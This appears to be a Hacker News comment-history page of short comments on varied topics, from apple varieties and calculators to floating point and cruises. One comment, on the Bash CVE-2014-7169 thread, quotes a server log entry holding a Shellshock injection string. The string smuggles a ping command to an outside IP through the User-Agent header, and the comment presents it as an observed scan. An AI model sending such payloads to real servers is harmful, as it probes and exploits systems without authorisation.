letney | 11 years ago | on: How we built Flow
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letney | 11 years ago | on: The Windows Incident – Day 0
letney | 11 years ago | on: CVE-2014-7169: Bash Fix Incomplete, Still Exploitable
>89.207.135.125 - - - "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 302 483 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
...searching for vulnerable CPanel installs.
letney | 11 years ago | on: The Awful Reign of the Red Delicious
They are very crisp and sweet without the tart flavor other crisp varieties seem to have. They also don't go brown after cutting for a very long time.
Definitely worth the slightly higher price in the supermarket. I very much miss them when they are out of season.
letney | 11 years ago | on: The unstoppable TI-84 Plus: How an outdated calculator still holds a monopoly
I can only offer an emphatic YES. I think that there are enough geeks out there that would like to see this monopoly broken that I predict a Kickstarter would be a rousing success.
letney | 11 years ago | on: Death by Inches: The battle over the metric system in America
Not true, the IEEE 754-2008 standard provides a Decimal Floating Point specification in binary.
http://en.wikipedia.org/wiki/Decimal_floating_point#IEEE_754...
letney | 11 years ago | on: Death by Inches: The battle over the metric system in America
letney | 11 years ago | on: IRS claims to have lost 2 years of Director's emails
This discussion hearkens back to the current investigation into John Swallow, the former Attorney General of Utah who resigned less than a year into his term and is currently the subject of multiple investigations.
Swallow 'lost' over 1,700 emails from his time in office on his home computer. The state of Utah has spent over $100,000 to recover them (some successfully), see: http://www.sltrib.com/sltrib/news/57648883-78/swallow-sltrib...
letney | 11 years ago | on: Show HN: A fast ISO8601 date-time parser for Python
letney | 11 years ago | on: Gamma Wave Brain Zaps Induce Lucid Dreaming
Many were tied with sleep paralysis, which didn't give me the fear that most people associate with it. Sometimes I could extract my preceptual self from my body and experience walking around the room in a weird lucid dream world. All while simultaneously being aware of my pysical body lying in bed.
I would love to have those dreams again.
letney | 11 years ago | on: The Pocket Handbook of Image Processing Algorithms in C (1993) [pdf]
The postfix operator can incur a temporary variable to be created by the compiler and thus make code slower.
Reference: http://www.idinews.com/peeves/prefixIncr.html
Also, item #6 from "More Effective C++": http://bin-login.name/ftp/pub/docs/programming_languages/cpp...
letney | 11 years ago | on: Nginx has replaced Apache as the most used web server among the top 10,000 sites
letney | 11 years ago | on: Why is NaN not equal to NaN?
For textures, they are great as they don't interpolate w/ nearby neighbors and properly discard fragments & vertices without the aforementioned cost of an extra boolean attribute.
letney | 12 years ago | on: Pwn2Own results for Wednesday (Day One)
[1] http://www.fastcolabs.com/3027664/under-the-hood-of-mozillas...
letney | 12 years ago | on: Where Football Players Call Home
As a resident of Hawaii it often peeves me to see it left out of so many geographic info-graphics.
Hawaii as a sizeable Polynesian pupulation, so my guess is that both the total and per-capita numbers for Hawaii are on the high end of the spectrum.
It's too bad this is not revealed in an otherwise great visualization.
letney | 12 years ago | on: Do you know your bitwise operators?
letney | 12 years ago | on: Poll: Do you have a Facebook account?
I have 0 friends and the only content is a single status post of:
"I don't use facebook, please contact me via email".
letney | 12 years ago | on: Ask HN: Where do you spend Bitcoins?
letney | 12 years ago | on: Wikileaks publishes 500k new Stratfor emails
[1] http://blogs.fas.org/secrecy/2013/06/dod-classified/
(assuming there is classified information in the documents)
letney | 12 years ago | on: Cruise Sheet: Find cruise deals
Drinks (including soda, coffee, and of course alcohol) are very much not free though. You are also not allowed to bring any alcohol on board.
Some cruises have begun charging "charging extra for new premium amenities such as fancy alternative restaurants" [1] -- but the run of the mill buffets are all you can eat and free.
[1] http://www.aarp.org/travel/cruises/info-08-2012/cruise-ships...